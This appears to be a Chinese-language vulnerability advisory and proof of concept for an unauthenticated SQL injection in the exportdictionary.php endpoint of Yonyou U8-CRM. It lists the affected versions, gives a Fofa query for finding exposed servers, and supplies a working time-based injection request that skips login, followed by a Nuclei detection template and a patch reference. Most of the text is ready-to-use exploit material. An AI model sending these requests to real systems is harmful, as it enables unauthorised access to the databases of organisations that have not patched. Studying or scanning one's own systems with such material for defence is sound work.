用友U8-CRM exportdictionary.php SQL注入

0x01 漏洞描述：

用友U8-CRM的/devtools/tools/exportdictionary.php接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性，甚至获取对数据库的完全控制。

0x02 影响版本：

V16.1, V16.0, V15.1, V15.0, V13

0x03 搜索语句：

Fofa：title="用友U8CRM"

0x04 漏洞复现：

GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Connection: close

0x05 Nuclei

id: yongyouU8_CRM-exportdictionary_php-SQL
info:
  name: 用友U8-CRM exportdictionary.php存在SQL注入
  author: iSee857
  severity: high
  metadata:
    fofa-query: body="用友U8CRM"

http:
  - raw:
      - |
        GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
        Cookie: PHPSESSID=bgsesstimeout-

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
         - "duration>=3  && duration<=6 && status_code==200"

0x06 修复建议：

官网获取补丁包：U8CRM存在SQL注入漏洞的安全补丁240828.zip